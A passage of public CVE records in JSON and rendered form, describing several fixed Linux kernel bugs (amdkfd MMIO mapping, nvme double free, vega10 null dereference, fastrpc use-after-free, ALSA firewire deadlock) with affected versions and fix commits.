"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.166",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: don\u0027t allow mapping the MMIO HDP page with large pages\n\nWe don\u0027t get the right offset in that case. The GPU has\nan unused 4K area of the register BAR space into which you can\nremap registers. We remap the HDP flush registers into this\nspace to allow userspace (CPU or GPU) to flush the HDP when it\nupdates VRAM. However, on systems with \u003e4K pages, we end up\nexposing PAGE_SIZE of MMIO space."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:03.246Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/009c4d78bcf07c4ac2e3dd9f275b4eaa72b4f884"
},
{
"url": "https://git.kernel.org/stable/c/f7276cdc1912325b64c33fcb1361952c06e55f63"
},
{
"url": "https://git.kernel.org/stable/c/8ad4838040e5515939c071a0f511ce2661a0889d"
},
{
"url": "https://git.kernel.org/stable/c/89fffbdf535ce659c1a26b51ad62070566e33b28"
},
{
"url": "https://git.kernel.org/stable/c/4b4cff994a27ebf7bd3fb9a798a1cdfa8d01b724"
},
{
"url": "https://git.kernel.org/stable/c/6186c93560889265bfe0914609c274eff40bbeb5"
},
{
"url": "https://git.kernel.org/stable/c/be4a2a81b6b90d1a47eaeaace4cc8e2cb57b96c7"
}
],
"title": "drm/amdkfd: don\u0027t allow mapping the MMIO HDP page with large pages",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41011",
"datePublished": "2024-07-18T07:04:04.823Z",
"dateReserved": "2024-07-12T12:17:45.610Z",
"dateUpdated": "2025-05-04T09:20:03.246Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41073 (GCVE-0-2024-41073)
Vulnerability from cvelistv5
Published
2024-07-29 14:57
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nvme: avoid double free special payload
If a discard request needs to be retried, and that retry may fail before
a new special payload is added, a double free will result. Clear the
RQF_SPECIAL_LOAD when the request is cleaned.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.307Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c5942a14f795de957ae9d66027aac8ff4fe70057"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f3ab45aacd25d957547fb6d115c1574c20964b3b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae84383c96d6662c24697ab6b44aae855ab670aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b9fd1265fac85916f90b4648de02adccdb7220b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e5d574ab37f5f2e7937405613d9b1a724811e5ad"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41073",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:21:30.593926Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:00.546Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "882574942a9be8b9d70d13462ddacc80c4b385ba",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c5942a14f795de957ae9d66027aac8ff4fe70057",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f3ab45aacd25d957547fb6d115c1574c20964b3b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ae84383c96d6662c24697ab6b44aae855ab670aa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1b9fd1265fac85916f90b4648de02adccdb7220b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e5d574ab37f5f2e7937405613d9b1a724811e5ad",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.237",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.101",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.42",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.237",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.164",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.101",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: avoid double free special payload\n\nIf a discard request needs to be retried, and that retry may fail before\na new special payload is added, a double free will result. Clear the\nRQF_SPECIAL_LOAD when the request is cleaned."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:28.657Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/882574942a9be8b9d70d13462ddacc80c4b385ba"
},
{
"url": "https://git.kernel.org/stable/c/c5942a14f795de957ae9d66027aac8ff4fe70057"
},
{
"url": "https://git.kernel.org/stable/c/f3ab45aacd25d957547fb6d115c1574c20964b3b"
},
{
"url": "https://git.kernel.org/stable/c/ae84383c96d6662c24697ab6b44aae855ab670aa"
},
{
"url": "https://git.kernel.org/stable/c/1b9fd1265fac85916f90b4648de02adccdb7220b"
},
{
"url": "https://git.kernel.org/stable/c/e5d574ab37f5f2e7937405613d9b1a724811e5ad"
}
],
"title": "nvme: avoid double free special payload",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41073",
"datePublished": "2024-07-29T14:57:33.253Z",
"dateReserved": "2024-07-12T12:17:45.631Z",
"dateUpdated": "2025-05-04T09:21:28.657Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43905 (GCVE-0-2024-43905)
Vulnerability from cvelistv5
Published
2024-08-26 10:11
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/pm: Fix the null pointer dereference for vega10_hwmgr
Check return value and conduct null pointer handling to avoid null pointer dereference.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43905",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:36.928558Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:56.871Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2ac9deb7e087f0b461c3559d9eaa6b9cf19d3fa8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0fa11f9df96217c2785b040629ff1a16900fb51c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c2629daf218a325f4d69754452cd42fe8451c15b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2e538944996d0dd497faf8ee81f8bfcd3aca7d80",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "69a441473fec2fc2aa2cf56122d6c42c4266a239",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "50151b7f1c79a09117837eb95b76c2de76841dab",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.226",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.167",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.226",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.167",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: Fix the null pointer dereference for vega10_hwmgr\n\nCheck return value and conduct null pointer handling to avoid null pointer dereference."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:55.910Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2ac9deb7e087f0b461c3559d9eaa6b9cf19d3fa8"
},
{
"url": "https://git.kernel.org/stable/c/0fa11f9df96217c2785b040629ff1a16900fb51c"
},
{
"url": "https://git.kernel.org/stable/c/c2629daf218a325f4d69754452cd42fe8451c15b"
},
{
"url": "https://git.kernel.org/stable/c/2e538944996d0dd497faf8ee81f8bfcd3aca7d80"
},
{
"url": "https://git.kernel.org/stable/c/69a441473fec2fc2aa2cf56122d6c42c4266a239"
},
{
"url": "https://git.kernel.org/stable/c/50151b7f1c79a09117837eb95b76c2de76841dab"
}
],
"title": "drm/amd/pm: Fix the null pointer dereference for vega10_hwmgr",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43905",
"datePublished": "2024-08-26T10:11:06.619Z",
"dateReserved": "2024-08-17T09:11:59.293Z",
"dateUpdated": "2025-05-04T09:28:55.910Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48873 (GCVE-0-2022-48873)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 12:43
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
misc: fastrpc: Don't remove map on creater_process and device_release
Do not remove the map from the list on error path in
fastrpc_init_create_process, instead call fastrpc_map_put, to avoid
use-after-free. Do not remove it on fastrpc_device_release either,
call fastrpc_map_put instead.
The fastrpc_free_map is the only proper place to remove the map.
This is called only after the reference count is 0.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b49f6d83e290f17e20f4e5cf31288d3bb4955ea6 Version: b49f6d83e290f17e20f4e5cf31288d3bb4955ea6 Version: b49f6d83e290f17e20f4e5cf31288d3bb4955ea6 Version: b49f6d83e290f17e20f4e5cf31288d3bb4955ea6 Version: b49f6d83e290f17e20f4e5cf31288d3bb4955ea6 Version: aaf5aa44934ad069cac805923c49f6968b9a0d49 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48873",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:22.474051Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:53.911Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/misc/fastrpc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4b5c44e924a571d0ad07054de549624fbc04e4d7",
"status": "affected",
"version": "b49f6d83e290f17e20f4e5cf31288d3bb4955ea6",
"versionType": "git"
},
{
"lessThan": "193cd853145b63e670bd73740250983af1475330",
"status": "affected",
"version": "b49f6d83e290f17e20f4e5cf31288d3bb4955ea6",
"versionType": "git"
},
{
"lessThan": "1b7b7bb400dd13dcb03fc6e591bb7ca4664bbec8",
"status": "affected",
"version": "b49f6d83e290f17e20f4e5cf31288d3bb4955ea6",
"versionType": "git"
},
{
"lessThan": "35ddd482345c43d9eec1f3406c0f20a95ed4054b",
"status": "affected",
"version": "b49f6d83e290f17e20f4e5cf31288d3bb4955ea6",
"versionType": "git"
},
{
"lessThan": "5bb96c8f9268e2fdb0e5321cbc358ee5941efc15",
"status": "affected",
"version": "b49f6d83e290f17e20f4e5cf31288d3bb4955ea6",
"versionType": "git"
},
{
"status": "affected",
"version": "aaf5aa44934ad069cac805923c49f6968b9a0d49",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/misc/fastrpc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.2"
},
{
"lessThan": "5.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.1.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: fastrpc: Don\u0027t remove map on creater_process and device_release\n\nDo not remove the map from the list on error path in\nfastrpc_init_create_process, instead call fastrpc_map_put, to avoid\nuse-after-free. Do not remove it on fastrpc_device_release either,\ncall fastrpc_map_put instead.\n\nThe fastrpc_free_map is the only proper place to remove the map.\nThis is called only after the reference count is 0."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:43:56.545Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4b5c44e924a571d0ad07054de549624fbc04e4d7"
},
{
"url": "https://git.kernel.org/stable/c/193cd853145b63e670bd73740250983af1475330"
},
{
"url": "https://git.kernel.org/stable/c/1b7b7bb400dd13dcb03fc6e591bb7ca4664bbec8"
},
{
"url": "https://git.kernel.org/stable/c/35ddd482345c43d9eec1f3406c0f20a95ed4054b"
},
{
"url": "https://git.kernel.org/stable/c/5bb96c8f9268e2fdb0e5321cbc358ee5941efc15"
}
],
"title": "misc: fastrpc: Don\u0027t remove map on creater_process and device_release",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48873",
"datePublished": "2024-08-21T06:10:04.024Z",
"dateReserved": "2024-07-16T11:38:08.921Z",
"dateUpdated": "2025-05-04T12:43:56.545Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42274 (GCVE-0-2024-42274)
Vulnerability from cvelistv5
Published
2024-08-17 08:54
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Revert "ALSA: firewire-lib: operate for period elapse event in process context"
Commit 7ba5ca32fe6e ("ALSA: firewire-lib: operate for period elapse event
in process context") removed the process context workqueue from
amdtp_domain_stream_pcm_pointer() and update_pcm_pointers() to remove
its overhead.
With RME Fireface 800, this lead to a regression since
Kernels 5.14.0, causing an AB/BA deadlock competition for the
substream lock with eventual system freeze under ALSA operation:
thread 0:
* (lock A) acquire substream lock by
snd_pcm_stream_lock_irq() in
snd_pcm_status64()
* (lock B) wait for tasklet to finish by calling
tasklet_unlock_spin_wait() in
tasklet_disable_in_atomic() in
ohci_flush_iso_completions() of ohci.c
thread 1:
* (lock B) enter tasklet
* (lock A) attempt to acquire substream lock,
waiting for it to be released:
snd_pcm_stream_lock_irqsave() in
snd_pcm_period_elapsed() in
update_pcm_pointers() in
process_ctx_payloads() in
process_rx_packets() of amdtp-stream.c
? tasklet_unlock_spin_wait
</NMI>
<TASK>
ohci_flush_iso_completions firewire_ohci
amdtp_domain_stream_pcm_pointer snd_firewire_lib
snd_pcm_update_hw_ptr0 snd_pcm
snd_pcm_status64 snd_pcm
? native_queued_spin_lock_slowpath
</NMI>
<IRQ>
_raw_spin_lock_irqsave
snd_pcm_period_elapsed snd_pcm
process_rx_packets snd_firewire_lib
irq_target_callback snd_firewire_lib
handle_it_packet firewire_ohci
context_tasklet firewire_ohci
Restore the process context work queue to prevent deadlock
AB/BA deadlock competition for ALSA substream lock of
snd_pcm_stream_lock_irq() in snd_pcm_status64()
and snd_pcm_stream_lock_irqsave() in snd_pcm_period_elapsed().
revert commit 7ba5ca32fe6e ("ALSA: firewire-lib: operate for period
elapse event in process context")
Replace inline description to prevent future deadlock.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42274",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:12:01.822950Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:32.013Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/firewire/amdtp-stream.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7c07220cf634002f93a87ca2252a32766850f2d1",
"status": "affected",
"version": "7ba5ca32fe6e8d2e153fb5602997336517b34743",
"versionType": "git"
},
{
"lessThan": "b239a37d68e8bc59f9516444da222841e3b13ba9",
"status": "affected",
"version": "7ba5ca32fe6e8d2e153fb5602997336517b34743",
"versionType": "git"
},
{
"lessThan": "f5043e69aeb2786f32e84132817a007a6430aa7d",
"status": "affected",
"version": "7ba5ca32fe6e8d2e153fb5602997336517b34743",
"versionType": "git"
},
{
"lessThan": "36c255db5a25edd42d1aca48e38b8e95ee5fd9ef",
"status": "affected",
"version": "7ba5ca32fe6e8d2e153fb5602997336517b34743",
"versionType": "git"
},
{
"lessThan": "3dab73ab925a51ab05543b491bf17463a48ca323",
"status": "affected",
"version": "7ba5ca32fe6e8d2e153fb5602997336517b34743",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/firewire/amdtp-stream.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.45",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.104",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.45",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.4",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"ALSA: firewire-lib: operate for period elapse event in process context\"\n\nCommit 7ba5ca32fe6e (\"ALSA: firewire-lib: operate for period elapse event\nin process context\") removed the process context workqueue from\namdtp_domain_stream_pcm_pointer() and update_pcm_pointers() to remove\nits overhead.\n\nWith RME Fireface 800, this lead to a regression since\nKernels 5.14.0, causing an AB/BA deadlock competition for the\nsubstream lock with eventual system freeze under ALSA operation:\n\nthread 0:\n * (lock A) acquire substream lock by\n\tsnd_pcm_stream_lock_irq() in\n\tsnd_pcm_status64()\n * (lock B) wait for tasklet to finish by calling\n \ttasklet_unlock_spin_wait() in\n\ttasklet_disable_in_atomic() in\n\tohci_flush_iso_completions() of ohci.c\n\nthread 1:\n * (lock B) enter tasklet\n * (lock A) attempt to acquire substream lock,\n \twaiting for it to be released:\n\tsnd_pcm_stream_lock_irqsave() in\n 